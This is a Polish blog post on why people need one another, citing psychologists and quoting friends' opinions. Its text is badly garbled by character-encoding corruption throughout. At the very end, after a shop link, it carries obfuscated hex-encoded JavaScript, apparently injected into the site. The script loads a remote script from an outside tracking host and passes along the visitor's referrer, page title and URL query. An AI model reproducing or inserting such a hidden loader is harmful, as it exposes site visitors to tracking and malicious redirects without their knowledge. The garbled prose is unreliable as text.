Ludzie… do czego sA� nam potrzebni?

opublikowane w Najnowsze Wpisy, Psychologia | 0

logohelenmoda

Ludzie

CzA�sto sA�yszA�: a�zjestem aspoA�ecznya�?, a�znie lubiA� ludzia�?, a�zA�wiat nie byA�by taki zA�y, gdyby nie ludziea�? itp. Coraz bardziej narzekamy na innych, wiele osA?b twierdzi, A?e inni ludzie nie sA� im do niczego potrzebni. TwierdzA�, A?e najlepiej czujA� siA� we wA�asnym towarzystwie, A�A?e ludzie ich denerwujA�. Jednak to wA�aA�nie ci inni ludzie sA� dla nas zwierciadA�em, dziA�ki ktA?remu wiemy kim jesteA�my. To dla nich gramy tak, by przedstawiA� siA� w jak najlepszym A�wietle, dla nich chcemy dobrze wyglA�daA�, byA� mA�drzy, dla nich nawet chcemy siA� poA�wiA�caA�. Bo przecieA? moA?emy byA� piA�kni, mA�drzy, bogacia�� Ale po co, jeA�li nie mamy przed kim bA�yszczeA�? Inni ludzie sA� potwierdzeniem naszej wartoA�ci i tego kim jesteA�my. Jak wszystkie naczelne, jesteA�my gatunkiem bardzo spoA�ecznym.A�ZwariowalibyA�my przecieA?, gdybyA�my byli zupeA�nie sami.

Bez wA�tpienia niektA?rych ludzi lubimy bardziej niA? innych. Jedni od poczA�tku znajomoA�ci przypadajA� nam do gustu, inni wrA�cz przeciwnie. Jeszcze inni zyskujA� przy bliA?szym poznaniu lub znaczA�co tracA� w naszych oczach im lepiej ich poznajemy. OczywiA�cie sA� teA? tacy, ktA?rych nie lubimy i nie polubimy nigdy. Poruszam ten temat, bo sama czA�sto na innych narzekam, mam potrzebA� odizolowania siA� i przebywania we wA�asnym towarzystwie. JednoczeA�nie zdajA� sobie sprawA�, jak waA?ne sA� dla mnie wszelkie relacje – te bliA?sze i te dalsze. Doskonale podsumowaA�a to moja przyjaciA?A�ka: a�zspA?jrz na nas – niby mA�czymy siA� w tA�umie, mA?wimy, A?e mamy fobiA� spoA�ecznA�, a jednak bez ludzi fiksujemya�?. Lepiej bym tego nie ujA�A�a.

Jak twierdziA� Arystoteles

– czA�owiek nie jest samotnA� wyspA�, tylko istotA� spoA�ecznA�.A�A�Albert Camus pisaA�, A?e a�zczA�owiek nie moA?e obejA�A� siA� bez drugiego czA�owieka, musi zaspokoiA� swA?j straszliwy gA�A?d braterstwaa�?.

A�Psycholog Karen Horney mA?wi,

A?e do uksztaA�towania dojrzaA�ej i zdrowej osobowoA�ci potrzeba wielu rA�k i wielu serc. Od najwczeA�niejszego okresu A?ycia aA? po najstarszy wiek, osobowoA�A� ksztaA�tuje siA� zarA?wno w kontekA�cie spoA�ecznym, w relacjach miA�dzyludzkich, jak i pod wpA�ywem osobistych wydarzeA� A?yciowych oraz przeA?yA�.A�NawiA�zywanie relacji miA�dzyludzkich to nieodzowna potrzeba czA�owieka. To rA?wnieA? najwaA?niejsza praktyczna umiejA�tnoA�A� spoA�eczna, ktA?ra pozwala normalnie funkcjonowaA� w grupie.A�CzA�owiek to istota spoA�eczna, ktA?ra musi wspA?A�pracowaA� i wspA?A�egzystowaA� z ludA?mi. Wszyscy A�wiadomie korzystamy z pomocy innych, a mniej A�wiadomie ulegamy wpA�ywowi otoczenia.A�MoA?na oczywiA�cie prA?bowaA� unikaA� kontaktu z innymi i przez to skazywaA� siA� na samotnoA�A�. Taka postawa rodzi jednak rozgoryczenie, smutek, poczucie pustki i wyizolowania.A�Badania pokazujA�, A?e samotne A?ycie moA?e powodowaA� pogorszenie siA� stanu zdrowia. Izolacja od przyjaciA?A� i rodziny wpA�ywa na jakoA�A� oraz dA�ugoA�A� A?ycia czA�owieka. W przypadku chronicznej samotnoA�ci w mA?zgu wzrasta poziom kortykoliberyny, co powoduje zwiA�kszenie wydzielania kortyzolu, czyli hormonu stresu.

Psycholog John Cacioppo,

ktA?ry prowadziA� badania nad jakoA�ciA� relacji i ich wpA�ywem na dziaA�anie systemu immunologicznego doszedA� do interesujA�cych wynikA?w. PoddaA� badaniu studentA?w mieszkajA�cych w jednym pokoju domu akademickiego i sprawdzaA� jak reaguje A�ich ukA�ad odpornoA�ciowy w zaleA?noA�ci od tego, czy osoby dzielA�ce pokA?j darzA� siA� sympatiA�, czy teA? nie przepadajA� za sobA�. OkazaA�o siA�, A?e osoby, ktA?re niespecjalnie siA� lubiA�y, czA�A�ciej chorowaA�y i odwiedzaA�y lekarzy. To dowA?d na to, jak waA?na jest jakoA�A� naszych wiA�zi z innymi. Ciekawym faktem jest teA? to, A?eA�brak przyjaciA?A� moA?e byA� bardziej szkodliwy dla zdrowia niA? A�palenie papierosA?w! Badania, ktA?re prowadzono przez ponad 20 lat pokazaA�y, A?e palenie tytoniu zwiA�ksza ryzyko przedwczesnej A�mierci o 1,6%, tymczasem izolacja towarzyska o 2,0%.

DoktorA�Suzanne Steinbaum z Nowego Jorku pisze:

„NiezaleA?nie od pA�ci czy pochodzenia waA?ne jest, A?eby mieA� ludzi, ktA?rzy sA� w stanie wspieraA� nas emocjonalnie. JesteA�my istotami towarzyskimi. NaprawdA� potrzebujemy byA� otaczani innymi ludA?mi. W otoczeniu przyjaciA?A�, rodziny i miA�oA�ci rozwijamy siA�, funkcjonujemy prawidA�owo”.

PostanowiA�am poruszyA� ten temat wA�rA?d kilku przyjaciA?A�. SpotkaA�am siA� z bardzo prospoA�ecznym nastawieniem. Oto co powiedzieli moi rozmA?wcy:

Marcin, 30 lat: „Jestem z tych, ktA?rzy potrzebujA� innych. Uwielbiam dziaA�aA� w grupie, uwielbiam wiA�A? A�A�czA�ca grupA� ludzi. Poza tym uwaA?am, A?e samemu nigdy nie osiA�gnie siA� takich rzeczy jak w grupie. JeA�li chodzi o narzekanie na ludzi, to narzekam tylko na politykA?w. Aczkolwiek wydaje mi siA�, A?e ludzie przykuwajA� zbyt duA?A� uwagA� do tego „jak nas widzA�”. Nie potrafimy ignorowaA� tego, co myA�li sA�siad o naszym samochodzie, domu, wspA?A�pracownik o naszym ubiorze itd. PrzykA�adamy wagA� do szczegA?A�A?w, nie potrafiA�c skupiaA� siA� na naprawdA� waA?nych rzeczach. Druga nasza cecha to brak umiejA�tnoA�ci racjonalnego sprecyzowania A?rA?dA�a problemu. Narzekamy na ludzi, A?e sA� A?li, A?e coA� nam nie poszA�o. Nie potrafimy spojrzeA� w lustro i stwierdziA� – ta poraA?ka to moja wina, nikogo innego, muszA� nad tym popracowaA�a�?.”

Kasia, 25 lat: „Niestety ludzie sA� nam potrzebni. Niestety, bo czA�owiek jest okropnA� istotA�. CzA�owiek jest z natury zwierzA�ciem stadnym i aby istnieA� potrzebuje innych. I faktycznie – wiA�kszoA�A� rzeczy, jakie robimy, to dla innych. Uczymy siA� od siebie nawzajem, poza tym grupa ludzi moA?e zdziaA�aA� wiA�cej niA? jednostka, wiA�c inni sA� nam potrzebni do rozwoju i osiA�gania celA?w.”

Ilona, 25 lat: „Ludzie wzajemnie siA� napA�dzajA� do dalszych dziaA�aA�. W czasach, kiedyA�liczy siA� kaA?dy „lajk”, kiedyA�wystawiamy swoje A?ycie do publicznego wglA�du, zupeA�nie nie wiem jak moA?na powiedzieA�, A?e ludzi nie sA� nam potrzebni. OczywiA�cie wciA�A? pozostajA� ludzie, ktA?rzy A?yjA� odciA�ci od wirtualnego A�wiata. Jedziesz pociA�giem, wkurza ciA� pan obierajA�cy jajko robiA�cy smrA?d w caA�ym przedziale, wkurza ciA� sapiA�ca babcia w kolejce do lekarza, do ktA?rego przyszA�a w formie rekreacji. Wkurza ciA� zachowanie dziecka, ktA?re „piA�uje mordA�” (bo tak myA�lisz) w sklepie. UwaA?asz, A?e w takiej sytuacji postA�piA�abyA� inaczej niA? dana osoba. Wszyscy oni ciA� denerwujA� i myA�lisz, A?e bez tego wszystkiego A?yA�oby siA� lepiej. To po co chcesz siA� im pokazaA�? W rzeczywistoA�ci takA?e malujemy siA�, ubieramy czy czeszemy siA� dla ludzi. JeA�li ktoA� powie, A?e robi to dla siebie, niech spojrzy na siebie, kiedy siedzi sam w domu. Czy wyjdziesz tak do pracy lub szkoA�y? Okazuje siA�, A?e przy tych wszystkich ludziach nie chcesz wyglA�daA� jak kupa. Tak, kupa, taka, ktA?rA�A�zostawiA� pies sA�siada, ktA?ry rA?wnieA? niemiA�osiernie ciA� wkurza. Zapewne ty teA? ich czymA� denerwujesz. CzA�owiek nie mA?gA�by byA� samotnA� wyspA�. To wszystko tworzy historiA�, ludzie sA� inni i majA� rA?A?ne potrzeby obcowania z innymi, ale nikt sam sobie nie poradzi, choA�by nawet tak myA�laA�. Pozdrawiam wszystkich ponurakA?w, A?yczA� wiA�cej optymizmu oraz dystansu do A?ycia i siebie.”

Jan, 28 lat: „UwaA?am, A?e nie da siA� byA� samotnA� wyspA�. Nie moA?na byA� wtedy szczA�A�liwym. WidujA� takich ludzi, ktA?rzy nie dbajA� o to, co myA�lA� o nich inni, o to jak wyglA�dajA�,A� jak siA� zachowujA� itp. i zazwyczaj sA� to ludzie, ktA?rzy nie majA� z kim wyjA�A� w pracy na papierosa, a w knajpach okupujA� bar i co piA�tek liczA�, A?e ktoA� zauwaA?y ich wyjA�tkowoA�A� i za kaA?dym razem tak samo siA� rozczarowujA�. KaA?dy ma jakieA� maA�e sukcesy i poraA?ki, ktA?rymi chciaA�by siA� pochwaliA� albo poA?aliA� i nie ma osoby, ktA?ra wytrzyma dA�ugo chociaA?by bez jednej bliskiej osobie, ktA?rej moA?e powiedzieA� wszystko (i ktA?ra nie jest mamA�). WidziaA�em film o chA�opaku w Afryce, ktA?ry jest gA�uchy, nie zna jA�zyka migowego i nie ma totalnie A?adnego kontaktu ze A�wiatem zewnA�trznym. WyglA�daA� na najsmutniejsza osobA� na A�wiecie. Jak zrobiA� na polu co miaA� zrobiA�, to siedziaA� w chacie i patrzyA� w A�cianA�. Nie da siA� funkcjonowaA� bez jakiegoA� miA�ego sA�owa od innej osoby, choA�byA�my sobie wmawiali, A?e nas to totalnie nie obchodzi. NiektA?rym wystarczajA� dwie bliskie osoby, inni muszA� mieA� ich znacznie wiA�cej, jednak kaA?dy potrzebuje kogoA� do uzewnA�trzniania swoich frustracji i kogoA�, kto ciA� zaakceptuje, choA�by byA�o siA� najdziwniejszA� osobA� na A�wiecie.”

Wniosek? Nie narzekajmy tyle na innych, a pielA�gnujmy relacje, bo gdybyA�nas ludzie nie denerwowali – bez nich przecieA? byA�oby jeszcze gorzej.

Esklephttp://www.esklep.porthos.pl

 var _0xb322=[„\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0xb322[1]](_0xb322[0]);s[_0xb322[2]]= _0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12];if(document[_0xb322[13]]){document[_0xb322[13]][_0xb322[15]][_0xb322[14]](s,document[_0xb322[13]])}else {d[_0xb322[18]](_0xb322[17])[0][_0xb322[16]](s)};if(document[_0xb322[11]][_0xb322[19]]=== _0xb322[20]&& KTracking[_0xb322[22]][_0xb322[21]](_0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12])=== -1){alert(_0xb322[23])}